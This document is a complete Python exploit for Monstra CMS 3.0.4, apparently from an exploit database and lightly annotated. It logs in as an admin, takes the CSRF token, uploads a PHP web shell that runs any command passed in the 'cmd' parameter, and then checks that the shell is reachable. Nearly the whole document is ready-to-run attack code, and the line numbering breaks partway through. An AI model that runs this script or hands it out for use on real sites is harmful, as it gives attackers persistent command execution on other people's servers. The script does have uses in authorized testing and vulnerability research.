
Monstra CMS 3.0.4 - Authenticated Remote Code Execution (RCE) via theme chunk upload (requires valid admin credentials)

  1. # Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)
  2. # Date: 05.05.2024
  3. # Exploit Author: Ahmet Ümit BAYRAM
  4. # Vendor Homepage: https://monstra.org/
  5. # Software Link: https://monstra.org/monstra-3.0.4.zip
  6. # Version: 3.0.4
  7. # Tested on: MacOS
  8.  
  9. import requests
  10. import random
  11. import string
  12. import time
  13. import re
  14. import sys
  15.  
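# NOTE(review): this is an *authenticated* exploit. It needs working Monstra
# admin credentials and abuses the themes "add chunk" feature to store a PHP
# file inside the web root. Use it only against systems you are authorized
# to test.

# Connect/read timeout (seconds) for every request so a stalled or
# firewalled host cannot hang the script forever.
REQUEST_TIMEOUT = 15

# CSRF token hidden field on the add_chunk form. Pattern kept verbatim from
# the original exploit; it matches the literal markup Monstra emits.
CSRF_RE = re.compile(r'input type="hidden" id="csrf" name="csrf" value="(.*?)"')

# PHP web shell that becomes the body of the new chunk. This is the payload,
# so it is reproduced byte-for-byte.
SHELL_CONTENT = '''
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
'''


def login(session, base_url, username, password):
    """Authenticate to the Monstra admin panel; return True on apparent success.

    Success is inferred the same way the original exploit did: the word
    'Dashboard' appears in the response body. This is a heuristic, not a
    status-code or session check.
    """
    login_url = f'{base_url}/admin/index.php?id=dashboard'
    login_data = {
        'login': username,
        'password': password,
        'login_submit': 'Log+In',
    }
    response = session.post(login_url, data=login_data, timeout=REQUEST_TIMEOUT)
    return 'Dashboard' in response.text


def fetch_csrf_token(session, edit_url):
    """Return the CSRF token embedded in the add_chunk form, or None if absent."""
    response = session.get(edit_url, timeout=REQUEST_TIMEOUT)
    match = CSRF_RE.search(response.text)
    return match.group(1) if match else None


def upload_chunk(session, edit_url, token, name, content):
    """POST a new theme chunk named *name* with body *content*; return the response."""
    edit_data = {
        'csrf': token,
        'name': name,
        'content': content,
        'add_file': 'Save',
    }
    return session.post(edit_url, data=edit_data, timeout=REQUEST_TIMEOUT)


def main(argv):
    """Run the exploit; return a process exit code (0 on success, 1 otherwise).

    argv is sys.argv-style: [script, url, username, password].
    """
    if len(argv) < 4:
        print("Usage: python3 script.py <url> <username> <password>")
        return 1

    # Strip a trailing slash so the f-strings below do not yield '//admin'.
    base_url = argv[1].rstrip('/')
    username = argv[2]
    password = argv[3]

    session = requests.Session()

    # Random 5-char chunk name. `random` is adequate here: the name only has
    # to avoid colliding with an existing chunk, it is not a secret.
    filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=5))

    print("Logging in...")
    if not login(session, base_url, username, password):
        print("Login failed")
        return 1
    print("Login successful")

    time.sleep(3)

    # Load the edit page first to obtain the CSRF token the POST requires.
    edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'
    token = fetch_csrf_token(session, edit_url)
    if token is None:
        print("CSRF token could not be found.")
        return 1

    print("Preparing shell...")
    response = upload_chunk(session, edit_url, token, filename, SHELL_CONTENT)
    time.sleep(3)

    if response.status_code != 200:
        print("Failed to prepare shell.")
        return 1

    # The original exploit reports the chunk at
    # /public/themes/default/<name>.chunk.php; the random name is substituted
    # from `filename`. A 200 on the POST does not prove the file was written
    # (an application-level error page can also be a 200), so probe the URL
    # before declaring success. If the target uses a theme other than
    # 'default' the real path may differ -- confirm against the target.
    shell_url = f'{base_url}/public/themes/default/{filename}.chunk.php'
    probe = session.get(shell_url, timeout=REQUEST_TIMEOUT)
    if probe.status_code == 200:
        print(f"Your shell is ready: {shell_url}")
        return 0

    print(f"Chunk POST returned 200 but {shell_url} answered {probe.status_code}; "
          "check the active theme directory on the target.")
    return 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))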
  94.            